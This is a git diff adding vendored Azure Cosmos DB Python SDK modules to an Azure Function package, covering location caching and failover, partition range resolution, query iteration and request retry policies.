OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Implements the abstraction to resolve target location for geo-replicated +DatabaseAccount with multiple writable and readable locations. +""" +import collections +import time + +from . import documents +from . 
import http_constants + +# pylint: disable=protected-access + + +class EndpointOperationType(object): + NoneType = "None" + ReadType = "Read" + WriteType = "Write" + + +def get_endpoint_by_location(locations): + endpoints_by_location = collections.OrderedDict() + parsed_locations = [] + + for location in locations: + if not location["name"]: + # during fail-over the location name is empty + continue + try: + region_uri = location["databaseAccountEndpoint"] + parsed_locations.append(location["name"]) + endpoints_by_location.update({location["name"]: region_uri}) + except Exception as e: + raise e + + return endpoints_by_location, parsed_locations + + +class LocationCache(object): # pylint: disable=too-many-public-methods,too-many-instance-attributes + def current_time_millis(self): # pylint: disable=no-self-use + return int(round(time.time() * 1000)) + + def __init__( + self, + preferred_locations, + default_endpoint, + enable_endpoint_discovery, + use_multiple_write_locations, + refresh_time_interval_in_ms, + ): + self.preferred_locations = preferred_locations + self.default_endpoint = default_endpoint + self.enable_endpoint_discovery = enable_endpoint_discovery + self.use_multiple_write_locations = use_multiple_write_locations + self.enable_multiple_writable_locations = False + self.write_endpoints = [self.default_endpoint] + self.read_endpoints = [self.default_endpoint] + self.location_unavailability_info_by_endpoint = {} + self.refresh_time_interval_in_ms = refresh_time_interval_in_ms + self.last_cache_update_time_stamp = 0 + self.available_read_endpoint_by_locations = {} + self.available_write_endpoint_by_locations = {} + self.available_write_locations = [] + self.available_read_locations = [] + + def check_and_update_cache(self): + if ( + self.location_unavailability_info_by_endpoint + and self.current_time_millis() - self.last_cache_update_time_stamp > self.refresh_time_interval_in_ms + ): + self.update_location_cache() + + def get_write_endpoints(self): + self.check_and_update_cache() + return self.write_endpoints + + def get_read_endpoints(self): + self.check_and_update_cache() + return self.read_endpoints + + def get_write_endpoint(self): + return self.get_write_endpoints()[0] + + def get_read_endpoint(self): + return self.get_read_endpoints()[0] + + def mark_endpoint_unavailable_for_read(self, endpoint): + self.mark_endpoint_unavailable(endpoint, EndpointOperationType.ReadType) + + def mark_endpoint_unavailable_for_write(self, endpoint): + self.mark_endpoint_unavailable(endpoint, EndpointOperationType.WriteType) + + def perform_on_database_account_read(self, database_account): + self.update_location_cache( + database_account._WritableLocations, + database_account._ReadableLocations, + database_account._EnableMultipleWritableLocations, + ) + + def get_ordered_write_endpoints(self): + return self.available_write_locations + + def get_ordered_read_endpoints(self): + return self.available_read_locations + + def resolve_service_endpoint(self, request): + if request.location_endpoint_to_route: + return request.location_endpoint_to_route + + location_index = int(request.location_index_to_route) if request.location_index_to_route else 0 + use_preferred_locations = ( + request.use_preferred_locations if request.use_preferred_locations is not None else True + ) + + if not use_preferred_locations or ( + documents._OperationType.IsWriteOperation(request.operation_type) + and not self.can_use_multiple_write_locations_for_request(request) + ): + # For non-document resource types in case of 
client can use multiple write locations + # or when client cannot use multiple write locations, flip-flop between the + # first and the second writable region in DatabaseAccount (for manual failover) + if self.enable_endpoint_discovery and self.available_write_locations: + location_index = min(location_index % 2, len(self.available_write_locations) - 1) + write_location = self.available_write_locations[location_index] + return self.available_write_endpoint_by_locations[write_location] + return self.default_endpoint + + endpoints = ( + self.get_write_endpoints() + if documents._OperationType.IsWriteOperation(request.operation_type) + else self.get_read_endpoints() + ) + return endpoints[location_index % len(endpoints)] + + def should_refresh_endpoints(self): # pylint: disable=too-many-return-statements + most_preferred_location = self.preferred_locations[0] if self.preferred_locations else None + + # we should schedule refresh in background if we are unable to target the user's most preferredLocation. + if self.enable_endpoint_discovery: + + should_refresh = self.use_multiple_write_locations and not self.enable_multiple_writable_locations + + if most_preferred_location: + if self.available_read_endpoint_by_locations: + most_preferred_read_endpoint = self.available_read_endpoint_by_locations[most_preferred_location] + if most_preferred_read_endpoint and most_preferred_read_endpoint != self.read_endpoints[0]: + # For reads, we can always refresh in background as we can alternate to + # other available read endpoints + return True + else: + return True + + if not self.can_use_multiple_write_locations(): + if self.is_endpoint_unavailable(self.write_endpoints[0], EndpointOperationType.WriteType): + # Since most preferred write endpoint is unavailable, we can only refresh in background if + # we have an alternate write endpoint + return True + return should_refresh + if most_preferred_location: + most_preferred_write_endpoint = self.available_write_endpoint_by_locations[most_preferred_location] + if most_preferred_write_endpoint: + should_refresh |= most_preferred_write_endpoint != self.write_endpoints[0] + return should_refresh + return True + return should_refresh + return False + + def clear_stale_endpoint_unavailability_info(self): + new_location_unavailability_info = {} + if self.location_unavailability_info_by_endpoint: + for unavailable_endpoint in self.location_unavailability_info_by_endpoint: + unavailability_info = self.location_unavailability_info_by_endpoint[unavailable_endpoint] + if not ( + unavailability_info + and self.current_time_millis() - unavailability_info["lastUnavailabilityCheckTimeStamp"] + > self.refresh_time_interval_in_ms + ): + new_location_unavailability_info[ + unavailable_endpoint + ] = self.location_unavailability_info_by_endpoint[unavailable_endpoint] + + self.location_unavailability_info_by_endpoint = new_location_unavailability_info + + def is_endpoint_unavailable(self, endpoint, expected_available_operations): + unavailability_info = ( + self.location_unavailability_info_by_endpoint[endpoint] + if endpoint in self.location_unavailability_info_by_endpoint + else None + ) + + if ( + expected_available_operations == EndpointOperationType.NoneType + or not unavailability_info + or expected_available_operations not in unavailability_info["operationType"] + ): + return False + + if ( + self.current_time_millis() - unavailability_info["lastUnavailabilityCheckTimeStamp"] + > self.refresh_time_interval_in_ms + ): + return False + # Unexpired entry present. 
Endpoint is unavailable + return True + + def mark_endpoint_unavailable(self, unavailable_endpoint, unavailable_operation_type): + unavailablility_info = ( + self.location_unavailability_info_by_endpoint[unavailable_endpoint] + if unavailable_endpoint in self.location_unavailability_info_by_endpoint + else None + ) + current_time = self.current_time_millis() + if not unavailablility_info: + self.location_unavailability_info_by_endpoint[unavailable_endpoint] = { + "lastUnavailabilityCheckTimeStamp": current_time, + "operationType": set([unavailable_operation_type]), + } + else: + unavailable_operations = set([unavailable_operation_type]).union(unavailablility_info["operationType"]) + self.location_unavailability_info_by_endpoint[unavailable_endpoint] = { + "lastUnavailabilityCheckTimeStamp": current_time, + "operationType": unavailable_operations, + } + self.update_location_cache() + + def get_preferred_locations(self): + return self.preferred_locations + + def update_location_cache(self, write_locations=None, read_locations=None, enable_multiple_writable_locations=None): + if enable_multiple_writable_locations: + self.enable_multiple_writable_locations = enable_multiple_writable_locations + + self.clear_stale_endpoint_unavailability_info() + + if self.enable_endpoint_discovery: + if read_locations: + self.available_read_endpoint_by_locations, self.available_read_locations = get_endpoint_by_location( # pylint: disable=line-too-long + read_locations + ) + + if write_locations: + self.available_write_endpoint_by_locations, self.available_write_locations = get_endpoint_by_location( # pylint: disable=line-too-long + write_locations + ) + + self.write_endpoints = self.get_preferred_available_endpoints( + self.available_write_endpoint_by_locations, + self.available_write_locations, + EndpointOperationType.WriteType, + self.default_endpoint, + ) + self.read_endpoints = self.get_preferred_available_endpoints( + self.available_read_endpoint_by_locations, + self.available_read_locations, + EndpointOperationType.ReadType, + self.write_endpoints[0], + ) + self.last_cache_update_timestamp = self.current_time_millis() # pylint: disable=attribute-defined-outside-init + + def get_preferred_available_endpoints( + self, endpoints_by_location, orderedLocations, expected_available_operation, fallback_endpoint + ): + endpoints = [] + # if enableEndpointDiscovery is false, we always use the defaultEndpoint that + # user passed in during documentClient init + if self.enable_endpoint_discovery and endpoints_by_location: # pylint: disable=too-many-nested-blocks + if ( + self.can_use_multiple_write_locations() + or expected_available_operation == EndpointOperationType.ReadType + ): + unavailable_endpoints = [] + if self.preferred_locations: + # When client can not use multiple write locations, preferred locations + # list should only be used determining read endpoints order. If client + # can use multiple write locations, preferred locations list should be + # used for determining both read and write endpoints order. 
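+                    # Illustrative walk-through (hypothetical regions): with
+                    # preferred_locations = ["West US", "East US"], both regions
+                    # present in endpoints_by_location, and "West US" currently
+                    # marked unavailable for the requested operation, the loop
+                    # below collects endpoints = [East US endpoint] and
+                    # unavailable_endpoints = [West US endpoint]; the unavailable
+                    # endpoint is appended at the end as a last-resort fallback.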
+ for location in self.preferred_locations: + endpoint = endpoints_by_location[location] if location in endpoints_by_location else None + if endpoint: + if self.is_endpoint_unavailable(endpoint, expected_available_operation): + unavailable_endpoints.append(endpoint) + else: + endpoints.append(endpoint) + + if not endpoints: + endpoints.append(fallback_endpoint) + + endpoints.extend(unavailable_endpoints) + else: + for location in orderedLocations: + if location and location in endpoints_by_location: + # location is empty during manual failover + endpoints.append(endpoints_by_location[location]) + + if not endpoints: + endpoints.append(fallback_endpoint) + + return endpoints + + def can_use_multiple_write_locations(self): + return self.use_multiple_write_locations and self.enable_multiple_writable_locations + + def can_use_multiple_write_locations_for_request(self, request): + return self.can_use_multiple_write_locations() and ( + request.resource_type == http_constants.ResourceType.Document + or ( + request.resource_type == http_constants.ResourceType.StoredProcedure + and request.operation_type == documents._OperationType.ExecuteJavaScript + ) + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_partition.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_partition.py new file mode 100644 index 0000000..1af7b5f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_partition.py @@ -0,0 +1,64 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for client side partition implementation in the Azure Cosmos +database service. +""" + +from six.moves import xrange + + +class Partition(object): + """A class that holds the hash value and node name for a partition. + """ + + def __init__(self, hash_value=None, node=None): + self.hash_value = hash_value + self.node = node + + def GetNode(self): + """Gets the name of the node(collection) for this object. + """ + return self.node + + def __eq__(self, other): + return (self.hash_value == other.hash_value) and (self.node == other.node) + + def __lt__(self, other): + if self == other: + return False + + return self.CompareTo(other.hash_value) < 0 + + def CompareTo(self, other_hash_value): + """Compare the passed hash value with the hash value of this object. 
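+
+        Illustrative doctest (hypothetical hash bytes; the most significant
+        byte sits at the end of the array, so it is compared first):
+
+        >>> Partition(hash_value=bytearray([1, 0])).CompareTo(bytearray([0, 2]))
+        -1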
+ """ + if len(self.hash_value) != len(other_hash_value): + raise ValueError("Length of hashes doesn't match.") + + # The hash byte array that is returned from ComputeHash method has the MSB at the end of the array + # so comparing the bytes from the end for compare operations. + for i in xrange(0, len(self.hash_value)): + if self.hash_value[len(self.hash_value) - i - 1] < other_hash_value[len(self.hash_value) - i - 1]: + return -1 + if self.hash_value[len(self.hash_value) - i - 1] > other_hash_value[len(self.hash_value) - i - 1]: + return 1 + return 0 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_query_iterable.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_query_iterable.py new file mode 100644 index 0000000..44e3778 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_query_iterable.py @@ -0,0 +1,101 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Iterable query results in the Azure Cosmos database service. +""" +from azure.core.paging import PageIterator # type: ignore +from azure.cosmos._execution_context import execution_dispatcher + +# pylint: disable=protected-access + + +class QueryIterable(PageIterator): + """Represents an iterable object of the query results. + + QueryIterable is a wrapper for query execution context. + """ + + def __init__( + self, + client, + query, + options, + fetch_function=None, + collection_link=None, + database_link=None, + partition_key=None, + continuation_token=None, + ): + """Instantiates a QueryIterable for non-client side partitioning queries. + + _ProxyQueryExecutionContext will be used as the internal query execution + context. + + :param CosmosClient client: Instance of document client. + :param (str or dict) query: + :param dict options: The request options for the request. + :param method fetch_function: + :param method resource_type: The type of the resource being queried + :param str resource_link: If this is a Document query/feed collection_link is required. 
+ + Example of `fetch_function`: + + >>> def result_fn(result): + >>> return result['Databases'] + + """ + self._client = client + self.retry_options = client.connection_policy.RetryOptions + self._query = query + self._options = options + if continuation_token: + options['continuation'] = continuation_token + self._fetch_function = fetch_function + self._collection_link = collection_link + self._database_link = database_link + self._partition_key = partition_key + self._ex_context = execution_dispatcher._ProxyQueryExecutionContext( + self._client, self._collection_link, self._query, self._options, self._fetch_function + ) + super(QueryIterable, self).__init__(self._fetch_next, self._unpack, continuation_token=continuation_token) + + def _unpack(self, block): + continuation = None + if self._client.last_response_headers: + continuation = self._client.last_response_headers.get("x-ms-continuation") or \ + self._client.last_response_headers.get('etag') + if block: + self._did_a_call_already = False + return continuation, block + + def _fetch_next(self, *args): # pylint: disable=unused-argument + """Return a block of results with respecting retry policy. + + This method only exists for backward compatibility reasons. (Because + QueryIterable has exposed fetch_next_block api). + + :return: List of results. + :rtype: list + """ + block = self._ex_context.fetch_next_block() + if not block: + raise StopIteration + return block diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_range.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_range.py new file mode 100644 index 0000000..e0aa343 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_range.py @@ -0,0 +1,76 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Range class implementation in the Azure Cosmos database service. +""" + + +class Range(object): + """Represents the Range class used to map the partition key of the document + to its associated collection. 
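+
+    Illustrative doctest:
+
+    >>> Range(1, 5).Contains(3)
+    True
+    >>> Range(1, 5).Intersect(Range(4, 9))
+    True
+    >>> Range(1, 5).Intersect(Range(6, 9))
+    False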
+ """ + + def __init__(self, low, high): + if low is None: + raise ValueError("low is None.") + if high is None: + raise ValueError("high is None.") + if low > high: + raise ValueError("Range low value must be less than or equal the high value.") + + self.low = low + self.high = high + + def __hash__(self): + return hash((self.low, self.high)) + + def __str__(self): + return str(self.low) + str(self.high) + + def __eq__(self, other): + return (self.low == other.low) and (self.high == other.high) + + def __lt__(self, other): + if self == other: + return False + return self.low < other.low or self.high < other.high + + def Contains(self, other): + """Check if the passed parameter is in the range of this object. + """ + if other is None: + raise ValueError("other is None.") + + if isinstance(other, Range): + return other.low >= self.low and other.high <= self.high + return self.Contains(Range(other, other)) + + def Intersect(self, other): + """Check if the passed parameter intersects the range of this object. + """ + if isinstance(other, Range): + max_low = self.low if (self.low >= other.low) else other.low + min_high = self.high if (self.high <= other.high) else other.high + + if max_low <= min_high: + return True + + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_range_partition_resolver.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_range_partition_resolver.py new file mode 100644 index 0000000..b9c227e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_range_partition_resolver.py @@ -0,0 +1,117 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Range partition resolver implementation in the Azure Cosmos database service. +""" + +from . import _range as prange + + +class RangePartitionResolver(object): + """RangePartitionResolver implements partitioning based on the ranges, + allowing you to distribute requests and data across a number of partitions. + """ + + def __init__(self, partition_key_extractor, partition_map): + """ + :param lambda partition_key_extractor: + Returning the partition key from the document passed. 
+ :param dict partition_map: + The dictionary of ranges mapped to their associated collection + """ + if partition_key_extractor is None: + raise ValueError("partition_key_extractor is None.") + if partition_map is None: + raise ValueError("partition_map is None.") + + self.partition_key_extractor = partition_key_extractor + self.partition_map = partition_map + + def ResolveForCreate(self, document): + """Resolves the collection for creating the document based on the partition key. + + :param dict document: The document to be created. + :return: Collection Self link or Name based link which should handle the Create operation. + :rtype: str + """ + if document is None: + raise ValueError("document is None.") + + partition_key = self.partition_key_extractor(document) + containing_range = self._GetContainingRange(partition_key) + + if containing_range is None: + raise ValueError("A containing range for " + str(partition_key) + " doesn't exist in the partition map.") + + return self.partition_map.get(containing_range) + + def ResolveForRead(self, partition_key): + """Resolves the collection for reading/querying the documents based on the partition key. + + :param dict document: The document to be read/queried. + :return: Collection Self link(s) or Name based link(s) which should handle the Read operation. + :rtype: list + """ + intersecting_ranges = self._GetIntersectingRanges(partition_key) + + collection_links = list() + for keyrange in intersecting_ranges: + collection_links.append(self.partition_map.get(keyrange)) + + return collection_links + + def _GetContainingRange(self, partition_key): + """Get the containing range based on the partition key. + """ + for keyrange in self.partition_map.keys(): + if keyrange.Contains(partition_key): + return keyrange + + return None + + def _GetIntersectingRanges(self, partition_key): + """Get the intersecting ranges based on the partition key. 
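+
+        Illustrative doctest (hypothetical two-range partition map):
+
+        >>> resolver = RangePartitionResolver(
+        ...     lambda doc: doc["key"],
+        ...     {prange.Range(0, 4): "collA", prange.Range(5, 9): "collB"})
+        >>> len(resolver._GetIntersectingRanges(prange.Range(3, 6)))
+        2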
+ """ + partitionkey_ranges = set() + intersecting_ranges = set() + + if partition_key is None: + return list(self.partition_map.keys()) + + if isinstance(partition_key, prange.Range): + partitionkey_ranges.add(partition_key) + elif isinstance(partition_key, list): + for key in partition_key: + if key is None: + return list(self.partition_map.keys()) + if isinstance(key, prange.Range): + partitionkey_ranges.add(key) + else: + partitionkey_ranges.add(prange.Range(key, key)) + else: + partitionkey_ranges.add(prange.Range(partition_key, partition_key)) + + for partitionKeyRange in partitionkey_ranges: + for keyrange in self.partition_map.keys(): + if keyrange.Intersect(partitionKeyRange): + intersecting_ranges.add(keyrange) + + return intersecting_ranges diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_request_object.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_request_object.py new file mode 100644 index 0000000..cec4317 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_request_object.py @@ -0,0 +1,49 @@ +# The MIT License (MIT) +# Copyright (c) 2018 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Represents a request object. 
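+
+Illustrative sketch (the endpoint URL is hypothetical): a RequestObject
+carries the routing hints that LocationCache.resolve_service_endpoint
+consumes later on.
+
+>>> request = RequestObject("docs", "Create")
+>>> request.route_to_location("https://myaccount-westus.documents.azure.com/")
+>>> request.location_endpoint_to_route
+'https://myaccount-westus.documents.azure.com/'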
+""" + + +class RequestObject(object): + def __init__(self, resource_type, operation_type, endpoint_override=None): + self.resource_type = resource_type + self.operation_type = operation_type + self.endpoint_override = endpoint_override + self.should_clear_session_token_on_session_read_failure = False + self.use_preferred_locations = None + self.location_index_to_route = None + self.location_endpoint_to_route = None + + def route_to_location_with_preferred_location_flag(self, location_index, use_preferred_locations): + self.location_index_to_route = location_index + self.use_preferred_locations = use_preferred_locations + self.location_endpoint_to_route = None + + def route_to_location(self, location_endpoint): + self.location_index_to_route = None + self.use_preferred_locations = None + self.location_endpoint_to_route = location_endpoint + + def clear_route_to_location(self): + self.location_index_to_route = None + self.use_preferred_locations = None + self.location_endpoint_to_route = None diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_resource_throttle_retry_policy.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_resource_throttle_retry_policy.py new file mode 100644 index 0000000..6d9bcc1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_resource_throttle_retry_policy.py @@ -0,0 +1,60 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for resource throttle retry policy implementation in the Azure +Cosmos database service. +""" + +from . import http_constants + + +class ResourceThrottleRetryPolicy(object): + def __init__(self, max_retry_attempt_count, fixed_retry_interval_in_milliseconds, max_wait_time_in_seconds): + self._max_retry_attempt_count = max_retry_attempt_count + self._fixed_retry_interval_in_milliseconds = fixed_retry_interval_in_milliseconds + self._max_wait_time_in_milliseconds = max_wait_time_in_seconds * 1000 + self.current_retry_attempt_count = 0 + self.cummulative_wait_time_in_milliseconds = 0 + + def ShouldRetry(self, exception): + """Returns true if should retry based on the passed-in exception. 
+ + :param (exceptions.CosmosHttpResponseError instance) exception: + :rtype: boolean + """ + if self.current_retry_attempt_count < self._max_retry_attempt_count: + self.current_retry_attempt_count += 1 + self.retry_after_in_milliseconds = 0 # pylint: disable=attribute-defined-outside-init + + if self._fixed_retry_interval_in_milliseconds: + self.retry_after_in_milliseconds = ( # pylint: disable=attribute-defined-outside-init + self._fixed_retry_interval_in_milliseconds + ) + elif http_constants.HttpHeaders.RetryAfterInMilliseconds in exception.headers: + self.retry_after_in_milliseconds = int( # pylint: disable = attribute-defined-outside-init + exception.headers[http_constants.HttpHeaders.RetryAfterInMilliseconds] + ) + + if self.cummulative_wait_time_in_milliseconds < self._max_wait_time_in_milliseconds: + self.cummulative_wait_time_in_milliseconds += self.retry_after_in_milliseconds + return True + + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_retry_options.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_retry_options.py new file mode 100644 index 0000000..b37e424 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_retry_options.py @@ -0,0 +1,56 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Class for retry options in the Azure Cosmos database service. +""" + + +class RetryOptions(object): + """The retry options to be applied to all requests when retrying. + + :ivar int MaxRetryAttemptCount: + Max number of retries to be performed for a request. Default value 9. + :ivar int FixedRetryIntervalInMilliseconds: + Fixed retry interval in milliseconds to wait between each retry ignoring + the retryAfter returned as part of the response. + :ivar int MaxWaitTimeInSeconds: + Max wait time in seconds to wait for a request while the retries are happening. + Default value 30 seconds. 
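+
+    Illustrative doctest:
+
+    >>> options = RetryOptions(max_retry_attempt_count=5)
+    >>> options.MaxRetryAttemptCount
+    5
+    >>> options.MaxWaitTimeInSeconds
+    30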
